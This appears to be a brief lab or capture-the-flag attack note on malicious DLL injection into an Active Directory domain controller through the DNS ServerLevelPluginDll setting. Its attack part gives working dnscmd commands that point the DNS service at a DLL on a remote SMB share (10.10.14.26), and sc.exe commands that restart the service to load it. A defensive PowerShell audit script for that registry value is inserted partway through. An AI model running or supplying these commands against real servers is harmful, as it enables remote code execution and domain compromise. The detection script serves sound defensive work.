Malicious DLL Injection on an Active Directory Domain Controller

$_Attack_Outline

🎯 Goal

🛠️ Prerequisites

🔥 How

dnscmd commands

dnscmd 127.0.0.1 /config /serverlevelplugindll \\10.10.14.26\new1\DNSPriv.dll

dnscmd megabank.local /config /serverlevelplugindll \\10.10.14.26\new1\DNSPriv.dll

* You can use either the localhost IP address or the FQDN

Start and Stop the DNS Service

sc.exe stop dns

sc.exe start dns
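
A defender-side check for the setting that the dnscmd commands above write, added here as an example and not part of the original page: it reads the ServerLevelPluginDll value from the DNS service's Parameters key on a domain controller and classifies what it finds. Assumptions: the value lives in the standard registry location shown in the code, and the function name Test-DnsPluginDll is hypothetical.

```powershell
# Added example: audit the DNS server plugin DLL setting on a domain controller.
# Assumption: the setting is stored under the standard DNS service Parameters key.
# Test-DnsPluginDll is a hypothetical name chosen for this example.
function Test-DnsPluginDll {
    [CmdletBinding()]
    param(
        [string]$KeyPath = 'HKLM:\SYSTEM\CurrentControlSet\Services\DNS\Parameters'
    )

    $entry = Get-ItemProperty -Path $KeyPath -Name 'ServerLevelPluginDll' -ErrorAction SilentlyContinue
    $value = if ($entry) { $entry.ServerLevelPluginDll } else { $null }

    # Default state: the value is absent or empty and no plugin is loaded.
    if ([string]::IsNullOrWhiteSpace($value)) {
        return [pscustomobject]@{ Status = 'NotSet'; Path = $null; Detail = 'No plugin DLL configured.' }
    }

    # A UNC path means the DNS service loads code from another host when it starts.
    # The file is deliberately not opened here, so this check never
    # authenticates to the remote share.
    if ($value -match '^\\\\') {
        return [pscustomobject]@{ Status = 'RemotePath'; Path = $value; Detail = 'Plugin DLL is loaded from a network share.' }
    }

    if (-not (Test-Path -LiteralPath $value -PathType Leaf)) {
        return [pscustomobject]@{ Status = 'MissingFile'; Path = $value; Detail = 'Configured DLL does not exist on disk.' }
    }

    # Local file: record signature state and hash so it can be compared
    # against the list of plugins the organisation actually deployed.
    $sig  = Get-AuthenticodeSignature -FilePath $value
    $hash = (Get-FileHash -LiteralPath $value -Algorithm SHA256).Hash
    $status = if ($sig.Status -eq 'Valid') { 'LocalSigned' } else { 'LocalUnsigned' }

    [pscustomobject]@{
        Status = $status
        Path   = $value
        Detail = "Signature: $($sig.Status); SHA256: $hash"
    }
}

# Anything other than NotSet deserves review; RemotePath and LocalUnsigned first.
$result = Test-DnsPluginDll
$result | Format-List
if ($result.Status -ne 'NotSet') {
    Write-Warning "ServerLevelPluginDll is set to '$($result.Path)' ($($result.Status))."
}
```

Run it from an elevated session on each DNS server. A value that appears between two runs means the setting was changed in the interval and will take effect at the next DNS service restart.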

SMB Sharing with Impacket